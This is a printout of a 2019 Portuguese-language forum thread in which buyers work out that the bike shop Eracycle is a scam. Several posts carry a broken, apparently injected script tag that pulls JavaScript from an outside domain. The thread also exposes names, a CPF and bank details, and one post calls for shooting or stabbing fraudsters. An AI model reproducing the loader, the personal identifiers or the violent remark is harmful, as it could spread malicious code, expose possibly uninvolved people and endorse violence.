Imprimir Página | Fechar Janela

Loja Falsa? Eracycle

Impresso de: Pedal.com.br
Categoria: Assuntos Gerais
Nome do Fórum: Fórum Principal
Descrição Fórum: Debate de assuntos gerais, independentes de modalidade.
URL: https://www.pedal.com.br/forum/forum_posts.asp?TID=97582
Data da Impressão: 28 Mar 2024 as 16:55
Versão do Software: Web Wiz Forums 12.07 - https://www.webwizforums.com


Tópico: Loja Falsa? Eracycle
Postado Por: aianabenet
Assunto: Loja Falsa? Eracycle
Data de Publicação: 06 Dez 2019 as 11:56
Boa tarde galera,

Comprei uma CALOI COMFORT num site desconhecido. Nem sei realmente como cheguei nele, talvez tenha sido numa das pesquisas no ZOOM.
Enfim, a questão é que eu acabei ficando arrependida da compra pois o site não tem sido muito transparente comigo.

Teoricamente é uma loja nova, até aí tudo bem. Antes de comprar eu olhei a situação do CNPJ na receita federal e conferi também o certificado de segurança do site, está tudo válido. No procon SP tb não tem reclamação registrada e nem no reclame aqui.

A loja é https://www.eracycle.com.br/

Pergutei a eles sobre o prazo, me informaram de 3 a 7 dias úteis. Pedi o código de rastreio e eles disseram não ter, mas que o produto já estava na transportadora.

Estou muito nervosa com isso. Sei que posso ter sido vítima de um golpe então se puderem não me julgar e sim me dar uma luz, agradeço!



Respostas:
Postado Por: Rogersnn
Data de Publicação: 06 Dez 2019 as 12:27
Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.


Postado Por: the brave
Data de Publicação: 06 Dez 2019 as 12:28
Geralmente transportadoras não tem tracking. Tentei falar nos 2 telefones e ninguem atendeu. O endereço me parece que não existe, pois Vila Olimpia, 411 sala 23? Vila Olimpia é um bairro e não nome de Rua. 
Pelo endereço não dá sequer para ir pessoalmente ao escritório deles. Enfim, espero que você receba sua bike. Boa sorte. 


-------------
William


Postado Por: black_ovelha
Data de Publicação: 06 Dez 2019 as 12:33
Originalmente postado por the brave the brave escreveu:

Geralmente transportadoras não tem tracking. Tentei falar nos 2 telefones e ninguem atendeu. O endereço me parece que não existe, pois Vila Olimpia, 411 sala 23? Vila Olimpia é um bairro e não nome de Rua. 
Pelo endereço não dá sequer para ir pessoalmente ao escritório deles. Enfim, espero que você receba sua bike. Boa sorte. 

Ao contrário, geralmente transportadoras TÊM tracking


Postado Por: the brave
Data de Publicação: 06 Dez 2019 as 12:50
Bom saber, eu nos meus 50 anos de compras nunca recebi um rss... 

-------------
William


Postado Por: ajunio3
Data de Publicação: 06 Dez 2019 as 12:52
Bom, o site não é lá estas coisas, meio suspeito, mas as vezes lojas muito recentes não tem muita grana inicialmente pra bancar um site realmente decente, mas não quer dizer automaticamente que seja um golpe

Agora não tem muito o que se fazer alem de esperar o prazo. 


Postado Por: the brave
Data de Publicação: 06 Dez 2019 as 12:57
Originalmente postado por the brave the brave escreveu:

Bom saber, eu nos meus 50 anos de compras nunca recebi um rss... 

É melhor então que a Alana aguarde completar os 7 dias e caso não receba a bike, cancele a compra no  cartão mesmo. 


-------------
William


Postado Por: ajunio3
Data de Publicação: 06 Dez 2019 as 12:59
Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.

Lembrando que pra isso (pedir cancelamento/estorno de pagamento DIRETAMENTE para operadora de cartão) requer um esforço tremendo em provar que se trata de um golpe/roubo. Primeiro terá que esgotar todas as possibilidades com a loja, guardando toda documentação e comunicação trocada com eles pra convencer o cartão a isso.

É possível, mas não é fácil


Postado Por: Fabio
Data de Publicação: 06 Dez 2019 as 13:20
Originalmente postado por ajunio3 ajunio3 escreveu:

Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.


Lembrando que pra isso (pedir cancelamento/estorno de pagamento DIRETAMENTE para operadora de cartão) requer um esforço tremendo em provar que se trata de um golpe/roubo. Primeiro terá que esgotar todas as possibilidades com a loja, guardando toda documentação e comunicação trocada com eles pra convencer o cartão a isso.

É possível, mas não é fácil



Eu sempre achei que só estornassem caso fosse um golpe de alguém usando o cartão como se fosse o dono e não o dono tendo caído numa roubada.


Postado Por: Leo Amaral
Data de Publicação: 06 Dez 2019 as 13:24
Recebeu a NF-e?

-------------
------
"If you don't know where you are going, any road will get you there." The Cheshire Cat in Alice's Adventures in Wonderland, Lewis Carroll. Antigo ltadeu70.


Postado Por: aianabenet
Data de Publicação: 06 Dez 2019 as 13:46
É. Eu dei uma desculpa que precisava me organizar pra ter alguém em casa pra receber, eles me disseram, que não tem como rastrear, porém que poderiam me avisar assim que a transportadora chegar na minha cidade.


Postado Por: aianabenet
Data de Publicação: 06 Dez 2019 as 13:47
É, eu fiquei desconfiada depois disso.


Postado Por: aianabenet
Data de Publicação: 06 Dez 2019 as 13:48
Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.


É. Eu dei uma desculpa que precisava me organizar pra ter alguém em casa pra receber, eles me disseram, que não tem como rastrear, porém que poderiam me avisar assim que a transportadora chegar na minha cidade.


Postado Por: aianabenet
Data de Publicação: 06 Dez 2019 as 13:50
Originalmente postado por ajunio3 ajunio3 escreveu:

Bom, o site não é lá estas coisas, meio suspeito, mas as vezes lojas muito recentes não tem muita grana inicialmente pra bancar um site realmente decente, mas não quer dizer automaticamente que seja um golpe

Agora não tem muito o que se fazer alem de esperar o prazo. 


Presumi isso quando vi. O site não é grande coisa, mas investiguei o CNPJ, o registro do domínio e também o certificado de segurança. Por tudo que encontrei, ta normal.

Eu fico com medo de estar sendo injusta. Ainda está no prazo. Mas eu to agoniada pra que chegue logo. hehehe


Postado Por: gm1987
Data de Publicação: 06 Dez 2019 as 13:53
Nem toda a transportadora tem rastreio (acessível ao cliente final).

O que você precisa fazer, de primeiro momento, é:

1: Seguir a dica do colega acima referente a NF-e, se não te enviaram, tem que ligar pedindo a NF-e, pois nenhuma transportadora leva sem a nota. Logo, se não há nota, a chance de ser golpe é imensa;

2: Pedir os dados de contato da transportadora, e com o número da nota fiscal, confirmar com a transportadora se existe a encomenda;

2: Esperar o prazo e torcer para não ser uma caixa de pedra.

O prazo de 7 dias eles vão te enrolando, depois vira 10 dias... depois a transportadora perdeu o pacote e vão te enviar outra... e assim te enrolam 60, 90 dias até não ter mais como estornar a compra.


Postado Por: aianabenet
Data de Publicação: 06 Dez 2019 as 14:34
Originalmente postado por gm1987 gm1987 escreveu:

Nem toda a transportadora tem rastreio (acessível ao cliente final).

O que você precisa fazer, de primeiro momento, é:

1: Seguir a dica do colega acima referente a NF-e, se não te enviaram, tem que ligar pedindo a NF-e, pois nenhuma transportadora leva sem a nota. Logo, se não há nota, a chance de ser golpe é imensa;

2: Pedir os dados de contato da transportadora, e com o número da nota fiscal, confirmar com a transportadora se existe a encomenda;

2: Esperar o prazo e torcer para não ser uma caixa de pedra.

O prazo de 7 dias eles vão te enrolando, depois vira 10 dias... depois a transportadora perdeu o pacote e vão te enviar outra... e assim te enrolam 60, 90 dias até não ter mais como estornar a compra.


Obrigada!

Solicitei no contato que eles dizem ser do finaceiro solicitando a NF-e, já que não me mandaram.
Aguardando eles me darem o contato. Vou aguardar até terça-feira, caso não tenha nenhuma resposta vou fazer um B.O. e entrar no PROCON nas pequenas causas.


Postado Por: Rogersnn
Data de Publicação: 06 Dez 2019 as 16:15

Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.
 

É. Eu dei uma desculpa que precisava me organizar pra ter alguém em casa pra receber, eles me disseram, que não tem como rastrear, porém que poderiam me avisar assim que a transportadora chegar na minha cidade.

Torço para que seja realmente isso. E nas próximas compras online, procure não só o preço.
Apesar de já ter tido problemas com lojas grandes também.
Originalmente postado por Fabio Fabio escreveu:

Originalmente postado por ajunio3 ajunio3 escreveu:

Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.

Lembrando que pra isso (pedir cancelamento/estorno de pagamento DIRETAMENTE para operadora de cartão) requer um esforço tremendo em provar que se trata de um golpe/roubo. Primeiro terá que esgotar todas as possibilidades com a loja, guardando toda documentação e comunicação trocada com eles pra convencer o cartão a isso.

É possível, mas não é fácil



Eu sempre achei que só estornassem caso fosse um golpe de alguém usando o cartão como se fosse o dono e não o dono tendo caído numa roubada.

Talvez não estornem a primeira parcela, mas se ficar provado que foi golpe, eles podem cancelar as outras parcelas.


Postado Por: 90452
Data de Publicação: 06 Dez 2019 as 17:12
É incrível como com tantas lojas físicas já consagradas com suas versões online há consumidores se arriscando em lojas online desconhecidas pelo fator preço. Digo isso pq eu mesmo já vim aqui perguntar sobre compras no AliExpress ou mesmo no Mercado Livre e, como já falaram nesse post, tb já tive problemas com lojas consagradas, como a Wallmart e a compra de dois celulares onde um veio com defeito e foi um parto para trocar um deles (levou "só" 3 meses). Realmente é muito suspeito não ter sido enviado a nf-e diretamente ao consumidor via e-mail e não ter rastreio da encomenda mas isso não chega a ser muito complicado, as Casas Bahia não mandam esses dados (pelo menos nos dias que eu comprava lá) nem avisos do andamento da entrega, tudo tem que ser acompanhado pelo site, entrando lá de tempos em tempos para ver como está o status da entrega:



Veja se isso existe na loja, indo lá no seu login e no produto que vc comprou. Como eu disse, não sei como está o sistema de entrega das CB hoje para comparação; o negócio é vc esperar os tais 10 dias e ver como fica. Se não for entregue, vai começar a sua via crucis para receber o que já foi pago. 


Postado Por: Fabio
Data de Publicação: 06 Dez 2019 as 17:33
MARIA FLAVIA FARIAS SILVA
CNPJ 35.082.048/0001-70
IE: 126.876.562.112
Rua Funchal 411 22º andar
Vila Olímpia
mariasilvafarias01(a)gmail.com
(17) 9641-8737


Estranho não conseguir achar na JUCESP

Abriu em 4/10/2019.


Postado Por: RodrigoCasita
Data de Publicação: 06 Dez 2019 as 17:45
Apenas querendo ajudar, o site está registrado no Registro Br com os mesmos dados que constam no rodapé de sua página.
https://registro.br/tecnologia/ferramentas/whois/?search=eracycle.com.br" rel="nofollow - https://registro.br/tecnologia/ferramentas/whois/?search=eracycle.com.br
Então se for golpe, ao menos estão usando os mesmos dados em todos os registros.
Talvez apenas trate-se de um empresa pequena e nova que está utilizando uma transportadora de menor porta (sem tracking por exemplo), pois custa menos.
No site da Receita Federal o endereço informado é Rua Funchal, 411 andar 22 na Vila Olimpia.
A saída é aguardar mesmo os 7 dias informado


Postado Por: MarcioRodrigues
Data de Publicação: 06 Dez 2019 as 18:10
Aparentemente e só Uma Empresa Pequena, que não trabalha com estoque Físico
provavelmente vai receber o Produto sim

e só aguardar


-------------
IBIS MOJO HD-R 27.5
KHS Alite 2000 26
Cake DLX5 27.5
Caloi Elite 29
Speed |KHS


Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 00:09
Originalmente postado por Rogersnn Rogersnn escreveu:


Torço para que seja realmente isso. E nas próximas compras online, procure não só o preço.
Apesar de já ter tido problemas com lojas grandes também.


Rapaz vou te dizer... serviu de uma coisa...lição.
Se realmente for furada, vou comprar outra bike e na verdade nem me importo muito em demorar de receber de volta o dinheiro, desde que receba e que sejam responsabilizados.

De toda forma, tem muitos dados expostos, é estranho que seja golpe. Ainda to tentando acreditar que é tudo paranoia minha.
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">


Postado Por: zoda
Data de Publicação: 07 Dez 2019 as 01:41
Originalmente postado por Fabio Fabio escreveu:

MARIA FLAVIA FARIAS SILVA
CNPJ 35.082.048/0001-70
IE:<span style="white-space:pre">     </span>126.876.562.112
Rua Funchal 411 22º andar
Vila Olímpia
mariasilvafarias01(a)gmail.com
(17) 9641-8737


Estranho não conseguir achar na JUCESP

<span style="color: rgb51, 51, 51; font-family: "Helvetica Neue", Arial, FreeSans, sans-serif; font-size: 12.8px; : rgb255, 255, 255;">Abriu em 4/10/2019.</span>



O prédio situado na Rua Funchal 411, São Paulo, SP, segundo o site abaixo, só tem 13 andares.
https://webescritorios.com.br/edificio-comercial/edificio-funchal-774" rel="nofollow - https://webescritorios.com.br/edificio-comercial/edificio-funchal-774 .
Segundo informações descritas acima a suposta empresa foi aberta recentemente e o DDD 17 não é de São Paulo, SP. Informações que sozinhas não significam nada, mas somando tudo que já foi informado, pode ser um sinal de alerta.
O site descreve que a empresa está há 3 anos como loja física, e 2 anos como online. Segundo informaram no tópico o CNPJ foi aberto em outubro desse ano. Nada impede de ter aberto outro CNPJ, mas é mais uma incoerência (levando em conta a informação de abertura descrita no tópico).
https://www.eracycle.com.br/duvidas-sobre-pagamentos-e-envio/
No Google Maps, digitando o endereço mencionado, aparece na foto uma placa de aluga-se com uns telefones. Tenta ligar para lá e pede informações.
No site abaixo tem um telefone (11- 3045-3261) que seria do prédio n° 411, na citada rua. Mais uma fonte de possível informação.
https://www.guiafacil.com/site/edificio-funchal/sao-paulo/sp/1130453261/
Como a bicicleta comprada foi uma Caloi, poderia entrar em contato com a mesma e tentar obter a informação se a suposta empresa é cliente deles.
Não fazendo qualquer juízo da suposta empresa, e baseado exclusivamente nas informações descritas nesse tópico, e na negativa de informações juntos aos telefones mencionados, ligaria para a operadora do cartão de crédito e tentaria cancelar a operação.


Postado Por: Paulo Valdevite
Data de Publicação: 07 Dez 2019 as 08:50
Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???


Postado Por: BR040
Data de Publicação: 07 Dez 2019 as 09:12
aproveitando o tópico vou relembrar, nunca compre nesta loja

                               https://www.sportsonline.global/" rel="nofollow - https://www.sportsonline.global


-------------
se você não parar de pedalar as dificuldades vão ficando para trás



Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 10:26
Originalmente postado por zoda zoda escreveu:

Originalmente postado por Fabio Fabio escreveu:

MARIA FLAVIA FARIAS SILVA
CNPJ 35.082.048/0001-70
IE:<span style="white-space:pre">     </span>126.876.562.112
Rua Funchal 411 22º andar
Vila Olímpia
mariasilvafarias01(a)gmail.com
(17) 9641-8737


Estranho não conseguir achar na JUCESP

<span style="color: rgb51, 51, 51; font-family: "Helvetica Neue", Arial, FreeSans, sans-serif; font-size: 12.8px; : rgb255, 255, 255;">Abriu em 4/10/2019.</span>



O prédio situado na Rua Funchal 411, São Paulo, SP, segundo o site abaixo, só tem 13 andares.
https://webescritorios.com.br/edificio-comercial/edificio-funchal-774 - https://webescritorios.com.br/edificio-comercial/edificio-funchal-774.
Segundo informações descritas acima a suposta empresa foi aberta recentemente e o DDD 17 não é de São Paulo, SP. Informações que sozinhas não significam nada, mas somando tudo que já foi informado, pode ser um sinal de alerta.
O site descreve que a empresa está há 3 anos como loja física, e 2 anos como online. Segundo informaram no tópico o CNPJ foi aberto em outubro desse ano. Nada impede de ter aberto outro CNPJ, mas é mais uma incoerência (levando em conta a informação de abertura descrita no tópico).
https://www.eracycle.com.br/duvidas-sobre-pagamentos-e-envio/
No Google Maps, digitando o endereço mencionado, aparece na foto uma placa de aluga-se com uns telefones. Tenta ligar para lá e pede informações.
No site abaixo tem um telefone (11- 3045-3261) que seria do prédio n° 411, na citada rua. Mais uma fonte de possível informação.
https://www.guiafacil.com/site/edificio-funchal/sao-paulo/sp/1130453261/
Como a bicicleta comprada foi uma Caloi, poderia entrar em contato com a mesma e tentar obter a informação se a suposta empresa é cliente deles.
Não fazendo qualquer juízo da suposta empresa, e baseado exclusivamente nas informações descritas nesse tópico, e na negativa de informações juntos aos telefones mencionados, ligaria para a operadora do cartão de crédito e tentaria cancelar a operação.


Assim como o amigo aqui em baixo, eu paguei via transferência bancária... (estupida que fui, mas é pq eu não tenho cartão de crédito, sempre junto o dinheiro pra pagar a vista e ter um melhor desconto... enfim). Já me informei com o meu banco, que me aconselhou que eu aguardasse o prazo e depois disso, constatando o golpe, que eu faça um boletim de ocorrência e entre nas pequenas causas. Eu posso não receber meu dinheiro de volta tão cedo, mas eles serão acionados e responsabilizados pelo transtorno que eles fizeram a gente passar.

Essa ideia de entrar em contato com a CALOI é boa também. Vou ligar lá na segunda-feira.

Não é pelo dinheiro em si, mas por ter sido enganada. Ainda acho estranho tudo isso...


Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 10:28
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???


É isso, eu não vou esperar mais que os 7 dias úteis, ainda estou dando um tempo até o 7º dia útil após a confirmação. Que é sexta-feira. Não chegando, na sexta-feira mesmo eu abro um Boletim de Ocorrência e eles vão se ver é com a justiça.< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">


Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 10:33
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

É isso, eu estou aguardando até 7 dias úteis após a confirmação. Que comigo também demorou 72h, mas eles informam isso no site. No meu caso, vai até sexta-feira, caso não chegue na própria sexta-feira eu vou abrir um boletim de ocorrência e eles vão se ver com a justiça.


Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 10:34
Originalmente postado por sidserra sidserra escreveu:

É incrível como com tantas lojas físicas já consagradas com suas versões online há consumidores se arriscando em lojas online desconhecidas pelo fator preço. Digo isso pq eu mesmo já vim aqui perguntar sobre compras no AliExpress ou mesmo no Mercado Livre e, como já falaram nesse post, tb já tive problemas com lojas consagradas, como a Wallmart e a compra de dois celulares onde um veio com defeito e foi um parto para trocar um deles (levou "só" 3 meses). Realmente é muito suspeito não ter sido enviado a nf-e diretamente ao consumidor via e-mail e não ter rastreio da encomenda mas isso não chega a ser muito complicado, as Casas Bahia não mandam esses dados (pelo menos nos dias que eu comprava lá) nem avisos do andamento da entrega, tudo tem que ser acompanhado pelo site, entrando lá de tempos em tempos para ver como está o status da entrega:



Veja se isso existe na loja, indo lá no seu login e no produto que vc comprou. Como eu disse, não sei como está o sistema de entrega das CB hoje para comparação; o negócio é vc esperar os tais 10 dias e ver como fica. Se não for entregue, vai começar a sua via crucis para receber o que já foi pago. 
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">


tem em parte, mas só aparece quando vc já pagou... tem pedido realizado e pagamento confirmado. Apenas...

Se arrependimento matasse...


Postado Por: Paulo Valdevite
Data de Publicação: 07 Dez 2019 as 10:35
Eu irei pessoalmente até encontrar o dono do anúncio.
Se eu não receber as bikes até quarta-feira, perderei dois dias de serviço, mas eu vou achar esse cidadão.


Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 10:40
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

Teoricamente, se confirmou dia 29.11, vc receberá dia 10.12. Aguarde até essa data, depois disso junte tudo que você tem de prova e dê entrada num boletim de ocorrência, que faz online mesmo. Em relação ao Procon ainda não sei como faz, mas vamos mantendo contato aqui pra gente se ajudar.


Postado Por: aianabenet
Data de Publicação: 07 Dez 2019 as 10:42
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Eu irei pessoalmente até encontrar o dono do anúncio.
Se eu não receber as bikes até quarta-feira, perderei dois dias de serviço, mas eu vou achar esse cidadão.
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

Cara, deixe tudo registrado, se encontrar, se possível até grave audio com o celular no bolso, sei lá.
E sobretudo, tome muito cuidado, por favor. Que bom que eu te encontrei porque a gente vai se ajudar.


Postado Por: hurry-gurits
Data de Publicação: 08 Dez 2019 as 23:55
Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Eu irei pessoalmente até encontrar o dono do anúncio.
Se eu não receber as bikes até quarta-feira, perderei dois dias de serviço, mas eu vou achar esse cidadão.
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

Cara, deixe tudo registrado, se encontrar, se possível até grave audio com o celular no bolso, sei lá.
E sobretudo, tome muito cuidado, por favor. Que bom que eu te encontrei porque a gente vai se ajudar.

Galera, torcendo aqui para que tudo dê certo.

Mas com estelionatário, a unica solução é bala na testa e faca no bucho, o crime é ridiculamente punido pelo código penal, esse papo de gravar, filmar, nada disto vale realmente a pena, se pesquisar o nome dos sócios da loja no site do tjus,  vai descobrir o tamanho da capivara dos sócios, isso já vai ser um indicador se você foi enganado, ou não.


-------------
scott single track 95 26" cromo
khs 204 full 2012 26"- R.I.P.
khs sixfifty 2500 27.5" - 2014
Mongoose XR PRO 29" - 2016
GT Sanction Pro 27.5" - 2015
GT Agressor 1.0 26" - 2012 - Pumptrack Edition


Postado Por: MarcioRodrigues
Data de Publicação: 09 Dez 2019 as 08:00
Legal hem, assim anima trocar o BIP pelo Verge


-------------
IBIS MOJO HD-R 27.5
KHS Alite 2000 26
Cake DLX5 27.5
Caloi Elite 29
Speed |KHS


Postado Por: GabrielSL329
Data de Publicação: 09 Dez 2019 as 08:27
Originalmente postado por hurry-gurits hurry-gurits escreveu:

Galera, torcendo aqui para que tudo dê certo.
Mas com estelionatário, a unica solução é bala na testa e faca no bucho, o crime é ridiculamente punido pelo código penal, esse papo de gravar, filmar, nada disto vale realmente a pena, se pesquisar o nome dos sócios da loja no site do tjus,  vai descobrir o tamanho da capivara dos sócios, isso já vai ser um indicador se você foi enganado, ou não.


Concordo plenamente!
A ideia de comércio eletrônico é ótima, mas deturpada por um bando de fdp que quer tirar vantagem em cima dos outros!
O jeito é comprar de lojas conhecidas ou do ML, que possui o programa de proteção ao comprador!


-------------
Gabriel Pires
MTB: Show Rocker 12v Orange
Speed: Caloi Strada Sora 16v (aposentada)


Postado Por: Paulo Valdevite
Data de Publicação: 09 Dez 2019 as 08:41
É golpe mesmo...perdemos.
O site é falso.


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 14:33
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

É golpe mesmo...perdemos.
O site é falso.


Você conseguiu ir lá? Pode me confirmar detalhes? Vou fazer um Boletim de Ocorrência


Postado Por: Paulo Valdevite
Data de Publicação: 09 Dez 2019 as 15:06
Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 15:22
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Já acionei a Caloi. Os emails que antes recebiam nem recebem mais. Inclusive, vou fazer o B.O agora e entrar com ação no Procon. Se quiser me adcionar no whatsapp pra nos falarmos, me avisa.




Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 15:59
E com certeza essa mulher que aparece como dona nem sabe da história.


Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 16:00
Tava vendo o site. Site de louco. Só tem bike e apenas 1 capacete. Fora coisas caras da Thule e grandes, que provavelmente devem falar que ia por transportadora também.


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 16:01
Originalmente postado por Fabio Fabio escreveu:

E com certeza essa mulher que aparece como dona nem sabe da história.


Provavelmente. Porém há outra pessoa envolvida. No site tem o CPF de outra pessoa, alguém que recebe pelo nome de LUCAS.


Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 16:02
Vocês o nome completo e CPF da conta onde foi depositado?


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 16:20
Originalmente postado por Fabio Fabio escreveu:

Vocês o nome completo e CPF da conta onde foi depositado?


Tenho. Acabei de constatar que no site não aparece mais, tentei comprar via depósito e confirma o pedido já direto sem aparecer a página. O cara deve ter percebido que deu mole e tirou do ar já.
Mas eu tinha um print.

Lucas de Souza Rubio

CAIXA ECONÔMICA FEDERAL

Ag 0927

Conta 63553-9

CPF 458.515.458-29



Postado Por: ghd
Data de Publicação: 09 Dez 2019 as 16:20
Qual bicicleta vocês compraram?
Foi a Bicicleta Caloi 100 Comfort Masculina Aro 26 Preta 21v A18 - Caloi por 509 reais?

-------------
https://www.strava.com/athletes/18579736" rel="nofollow - https://www.strava.com/athletes/18579736


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 16:21
Originalmente postado por ghd ghd escreveu:

Qual bicicleta vocês compraram?
Foi a Bicicleta Caloi 100 Comfort Masculina Aro 26 Preta 21v A18 - Caloi por 509 reais?


Sim. Comprei essa.


Postado Por: zoda
Data de Publicação: 09 Dez 2019 as 16:33
Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Já acionei a Caloi. Os emails que antes recebiam nem recebem mais. Inclusive, vou fazer o B.O agora e entrar com ação no Procon. Se quiser me adcionar no whatsapp pra nos falarmos, me avisa.




Procon? Para que se é tudo falso?
Tera que tentar ir contra o banco.
O banco vai alegar que abriram a conta com documentos falsos.


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 16:56
Originalmente postado por zoda zoda escreveu:

Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Já acionei a Caloi. Os emails que antes recebiam nem recebem mais. Inclusive, vou fazer o B.O agora e entrar com ação no Procon. Se quiser me adcionar no whatsapp pra nos falarmos, me avisa.




Procon? Para que se é tudo falso?
Tera que tentar ir contra o banco.
O banco vai alegar que abriram a conta com documentos falsos.


Sendo falso ou não, a justiça tem que "ficar de olho".
De toda forma, conheço umas pessoas q trabalham na CAIXA e vou ver o que pode ser feito.
Já fiz B.O. e aqui na minha cidade tem uma delegacia especializada em crimes ciberneticos, vou lá assim que validar o B.O.


Postado Por: ghd
Data de Publicação: 09 Dez 2019 as 16:59
Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por ghd ghd escreveu:

Qual bicicleta vocês compraram?
Foi a Bicicleta Caloi 100 Comfort Masculina Aro 26 Preta 21v A18 - Caloi por 509 reais?


Sim. Comprei essa.


E quanto estava o preço em outras lojas?
Queria entender o que levou a correr esse risco, ainda mais pagando em deposito/transferência.

-------------
